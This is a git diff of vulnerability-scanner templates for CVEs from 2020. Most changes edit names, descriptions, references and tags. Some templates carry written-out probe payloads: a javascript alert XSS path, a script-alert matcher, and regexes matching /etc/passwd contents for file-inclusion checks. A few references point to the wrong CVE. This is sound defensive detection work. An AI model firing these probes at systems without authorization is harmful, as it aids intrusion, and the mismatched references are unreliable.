+  tags: cve,cve2020,sco,xss,edb,packetstorm
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml
index f34de433e4..ee17c0939a 100644
--- a/cves/2020/CVE-2020-25506.yaml
+++ b/cves/2020/CVE-2020-25506.yaml
@@ -4,8 +4,7 @@ info:
   name: D-Link DNS-320 Unauthenticated Remote Code Execution
   author: gy741
   severity: critical
-  description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters
-    f_ntp_server, which in turn leads to arbitrary command execution.
+  description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
   reference:
     - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
     - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
@@ -15,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-25506
     cwe-id: CWE-78
-  tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router
+  tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml
index 13a35730dd..d94ff6daaa 100644
--- a/cves/2020/CVE-2020-2551.yaml
+++ b/cves/2020/CVE-2020-2551.yaml
@@ -1,14 +1,15 @@
 id: CVE-2020-2551
 
 info:
-  name: Unauthenticated Oracle WebLogic Server Remote Code Execution
+  name: Oracle WebLogic Server Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: 'Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0,
-    2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.'
+  description: |
+    Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.
   reference:
     - https://github.com/hktalent/CVE-2020-2551
     - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
+    - https://www.oracle.com/security-alerts/cpujan2020.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml
index 7945fd800a..d903481caa 100644
--- a/cves/2020/CVE-2020-25540.yaml
+++ b/cves/2020/CVE-2020-25540.yaml
@@ -1,18 +1,22 @@
 id: CVE-2020-25540
 
 info:
-  name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540)
+  name: ThinkAdmin 6 - Local File Inclusion
   author: geeknik
   severity: high
-  description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
+  description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
   reference:
     - https://www.exploit-db.com/exploits/48812
+    - https://github.com/zoujingli/ThinkAdmin/issues/244
+    - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/
+    - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25540
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-25540
     cwe-id: CWE-22
-  tags: cve,cve2020,thinkadmin,lfi
+  tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-25780.yaml b/cves/2020/CVE-2020-25780.yaml
index 35137f800d..651bd79aea 100644
--- a/cves/2020/CVE-2020-25780.yaml
+++ b/cves/2020/CVE-2020-25780.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-25780
 
 info:
-  name: Commvault CommCell Directory Traversal
+  name: Commvault CommCell - Local File Inclusion
   author: pdteam
   severity: high
-  description: In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead
-    view a file outside of the log-files folder.
+  description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
     - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
+    - http://kb.commvault.com/article/63264
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -44,4 +44,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-25864.yaml b/cves/2020/CVE-2020-25864.yaml
index b37368a0a8..ec0a74066b 100644
--- a/cves/2020/CVE-2020-25864.yaml
+++ b/cves/2020/CVE-2020-25864.yaml
@@ -1,12 +1,16 @@
 id: CVE-2020-25864
 
 info:
-  name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode is vulnerable to cross-site scripting
+  name: HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting
   author: c-sh0
   severity: medium
+  description: |
+    HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.
   reference:
     - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368
+    - https://www.hashicorp.com/blog/category/consul
     - https://nvd.nist.gov/vuln/detail/CVE-2020-25864
+  remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -41,4 +45,6 @@ requests:
       - type: word
         part: body_2
         words:
-          - "<!DOCTYPE html><script>alert(document.domain)</script>"
\ No newline at end of file
+          - "<!DOCTYPE html><script>alert(document.domain)</script>"
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-26073.yaml b/cves/2020/CVE-2020-26073.yaml
index eaea12f311..249ba38d43 100644
--- a/cves/2020/CVE-2020-26073.yaml
+++ b/cves/2020/CVE-2020-26073.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-26073
 
 info:
-  name: Cisco SD-WAN vManage Software Directory Traversal
+  name: Cisco SD-WAN vManage Software - Local File Inclusion
   author: madrobot
   severity: high
   description: |
-    A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
+    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
   reference:
     - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
   classification:
     cve-id: CVE-2020-26073
   tags: cve,cve2020,cisco,lfi
@@ -25,3 +26,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml
index e9e5f3810f..3f65be6b76 100644
--- a/cves/2020/CVE-2020-26153.yaml
+++ b/cves/2020/CVE-2020-26153.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-26153
 
 info:
-  name: Event Espresso Core-Reg XSS
+  name: Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+    Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.
   reference:
     - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
+    - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p
     - https://nvd.nist.gov/vuln/detail/CVE-2020-26153
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -36,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml
index ab5b42a3f3..04918c517f 100644
--- a/cves/2020/CVE-2020-26214.yaml
+++ b/cves/2020/CVE-2020-26214.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-26214
 
 info:
   name: Alerta < 8.1.0 - Authentication Bypass
-  author: CasperGN
+  author: CasperGN,daffainfo
   severity: critical
   description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.
   reference:
@@ -24,23 +24,34 @@ requests:
 
     matchers-condition: and
     matchers:
+
+      - type: word
+        part: body
+        words:
+          - '"alarm_model"'
+          - '"actions"'
+          - '"severity"'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '< 8.1.0')
+
       - type: status
         status:
           - 200
-      - type: regex
-        regex:
-          - 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
-        condition: or
-      - type: regex
-        regex:
-          - 'provider":\s*"ldap"'
-        condition: or
+
     extractors:
       - type: regex
-        part: body
-        name: alerta-version
+        name: version
+        internal: true
         group: 1
         regex:
-          - 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
+          - '"name": "Alerta ([0-9.]+)"'
+
+      - type: regex
+        group: 1
+        regex:
+          - '"name": "Alerta ([0-9.]+)"'
 
 # Enhanced by mp on 2022/04/22
diff --git a/cves/2020/CVE-2020-26876.yaml b/cves/2020/CVE-2020-26876.yaml
index 8f41f94c87..2fdc04789f 100644
--- a/cves/2020/CVE-2020-26876.yaml
+++ b/cves/2020/CVE-2020-26876.yaml
@@ -9,9 +9,13 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-26876
     - https://www.exploit-db.com/exploits/48910
     - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
+    - https://plugins.trac.wordpress.org/changeset/2388997
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2020-26876
-  tags: wordpress,plugin
+    cwe-id: CWE-306
+  tags: cve,cve2020,wordpress,wp-plugin,exposure,edb
 
 requests:
   - method: GET
@@ -21,16 +25,16 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "rest_post_invalid_id"
           - "\"(guid|title|content|excerpt)\":{\"rendered\":"
         condition: or
-        part: body
 
       - type: word
+        part: header
         words:
           - "application/json"
-        part: header
 
       - type: status
         status:
diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml
index 50f801cc29..d885fae5d2 100644
--- a/cves/2020/CVE-2020-26919.yaml
+++ b/cves/2020/CVE-2020-26919.yaml
@@ -4,18 +4,17 @@ info:
   name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution
   author: gy741
   severity: critical
-  description: NETGEAR ProSAFE Plus  before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId
-    and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions.
-    This will allow attackers to execute system commands.
+  description: NETGEAR ProSAFE Plus  before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
   reference:
     - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
     - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-26919
+    - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-26919
-  tags: cve,cve2020,netgear,rce,oast,router,unauth
+  tags: cve,cve2020,netgear,rce,oast,router,unauth,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml
index e639d4ab70..82117e89d1 100644
--- a/cves/2020/CVE-2020-26948.yaml
+++ b/cves/2020/CVE-2020-26948.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/btnz-k/emby_ssrf
     - https://nvd.nist.gov/vuln/detail/CVE-2020-26948
+    - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-27191.yaml b/cves/2020/CVE-2020-27191.yaml
index 78e22728b9..5a31464e24 100644
--- a/cves/2020/CVE-2020-27191.yaml
+++ b/cves/2020/CVE-2020-27191.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-27191
 
 info:
-  name: LionWiki 3.2.11 - LFI
+  name: LionWiki <3.2.12 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion.
+  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
   reference:
     - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
     - http://lionwiki.0o.cz/index.php?page=Main+page
-    - https://www.cvedetails.com/cve/CVE-2020-27191
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -30,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml
index cee31b2f96..b9f9b21595 100644
--- a/cves/2020/CVE-2020-27361.yaml
+++ b/cves/2020/CVE-2020-27361.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-27361
 
 info:
-  name: Akkadian Provisioning Manager - Files Listing
+  name: Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure
   author: gy741
   severity: high
-  description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
+  description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.
   reference:
     - https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -30,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-27467.yaml b/cves/2020/CVE-2020-27467.yaml
index e42165e158..c3bfd9c523 100644
--- a/cves/2020/CVE-2020-27467.yaml
+++ b/cves/2020/CVE-2020-27467.yaml
@@ -1,15 +1,15 @@
 id: CVE-2020-27467
 
 info:
-  name: Processwire CMS < 2.7.1 - Directory Traversal
+  name: Processwire CMS <2.7.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Local File Inclusion in Processwire CMS < 2.7.1 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote
-    attacker can retrieve the contents of sensitive files on the local system.
+  description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.
   reference:
     - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire
     - https://processwire.com/
-    - https://www.cvedetails.com/cve/CVE-2020-27467
+    - https://github.com/ceng-yildirim/LFI-processwire
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27467
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -31,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml
index bd7091799d..1872a84f50 100644
--- a/cves/2020/CVE-2020-27735.yaml
+++ b/cves/2020/CVE-2020-27735.yaml
@@ -1,12 +1,14 @@
 id: CVE-2020-27735
 
 info:
-  name: Wing FTP's Web Interface XSS
+  name: Wing FTP 6.4.4 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
+    Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
   reference:
+    - https://www.wftpserver.com/serverhistory.htm
+    - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html
     - https://nvd.nist.gov/vuln/detail/CVE-2020-27735
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -18,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/help/english/index.html?javascript&#58;alert(document.domain)"
+      - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
 
     matchers-condition: and
     matchers:
@@ -35,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml
index 0bd51729fb..192bcb500f 100644
--- a/cves/2020/CVE-2020-27866.yaml
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -1,16 +1,16 @@
 id: CVE-2020-27866
 
 info:
-  name: NETGEAR Authentication Bypass vulnerability
+  name: NETGEAR - Authentication Bypass
   author: gy741
   severity: high
-  description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020,
-    Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
+  description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.
   reference:
     - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
     - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
     - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
   classification:
     cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -37,4 +37,6 @@ requests:
       - type: word
         words:
           - 'Debug Enable!'
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml
index 5ca95cda07..25499ad7a7 100644
--- a/cves/2020/CVE-2020-27982.yaml
+++ b/cves/2020/CVE-2020-27982.yaml
@@ -1,18 +1,23 @@
 id: CVE-2020-27982
 
 info:
-  name: IceWarp WebMail Reflected XSS
+  name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: IceWarp 11.4.5.0 allows XSS via the language parameter.
+  description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
   reference:
     - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
+    - https://cxsecurity.com/issue/WLB-2020100161
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27982
+    - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-27982
     cwe-id: CWE-79
-  tags: cve,cve2020,xss,icewarp
+  metadata:
+    shodan-query: title:"icewarp"
+  tags: xss,icewarp,packetstorm,cve,cve2020
 
 requests:
   - method: GET
@@ -33,4 +38,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml
index b59fc6a4bb..7abfe56c38 100644
--- a/cves/2020/CVE-2020-27986.yaml
+++ b/cves/2020/CVE-2020-27986.yaml
@@ -1,15 +1,16 @@
 id: CVE-2020-27986
 
 info:
-  name: SonarQube unauth
+  name: SonarQube - Authentication Bypass
   author: pikpikcu
   severity: high
   description: |
     SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
     SVN, and GitLab credentials via the api/settings/values URI.
-    NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
+  remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
   reference:
     - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml
index 318dd7889b..6e4100be64 100644
--- a/cves/2020/CVE-2020-28208.yaml
+++ b/cves/2020/CVE-2020-28208.yaml
@@ -7,6 +7,8 @@ info:
   description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
   reference:
     - https://trovent.io/security-advisory-2010-01
+    - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt
+    - http://www.openwall.com/lists/oss-security/2021/01/07/1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml
index 02e593bdfc..626807e495 100644
--- a/cves/2020/CVE-2020-28351.yaml
+++ b/cves/2020/CVE-2020-28351.yaml
@@ -1,20 +1,20 @@
 id: CVE-2020-28351
 
 info:
-  name: ShoreTel 19.46.1802.0 XSS
+  name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to
-    insufficient validation for the time_zone object in the HOME_MEETING& page
+  description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
   reference:
     - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
+    - https://www.mitel.com/articles/what-happened-shoretel-products
     - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-28351
     cwe-id: CWE-79
-  tags: cve,cve2020,shoretel,xss
+  tags: packetstorm,cve,cve2020,shoretel,xss
 
 requests:
   - method: GET
@@ -38,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml
index 4aafb656fc..1d08b57be1 100644
--- a/cves/2020/CVE-2020-28871.yaml
+++ b/cves/2020/CVE-2020-28871.yaml
@@ -4,8 +4,7 @@ info:
   name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
   author: gy741
   severity: critical
-  description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized
-    attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
+  description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
   reference:
     - https://www.exploit-db.com/exploits/48980
     - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
@@ -15,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-28871
     cwe-id: CWE-434
-  tags: cve,cve2020,monitorr,rce,oast,unauth
+  tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml
index 068d0187e0..d55bcfc93a 100644
--- a/cves/2020/CVE-2020-28976.yaml
+++ b/cves/2020/CVE-2020-28976.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/49189
     - https://nvd.nist.gov/vuln/detail/CVE-2020-28976
+    - https://www.canto.com/integrations/wordpress/
+    - https://github.com/CantoDAM/Canto-Wordpress-Plugin
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2020-28976
     cwe-id: CWE-918
-  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
+  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml
index 50535f3d67..a2208f4524 100644
--- a/cves/2020/CVE-2020-29164.yaml
+++ b/cves/2020/CVE-2020-29164.yaml
@@ -1,12 +1,14 @@
 id: CVE-2020-29164
 
 info:
-  name: PacsOne Server XSS
+  name: PacsOne Server <7.1.1 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).
+  description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.
   reference:
     - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d
+    - https://pacsone.net/download.htm
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-29164
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml
index 57794f4f65..2ad1cca8f4 100644
--- a/cves/2020/CVE-2020-29227.yaml
+++ b/cves/2020/CVE-2020-29227.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-29227
 
 info:
-  name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
+  name: Car Rental Management System 1.0 - Local File Inclusion
   author: daffainfo
   severity: critical
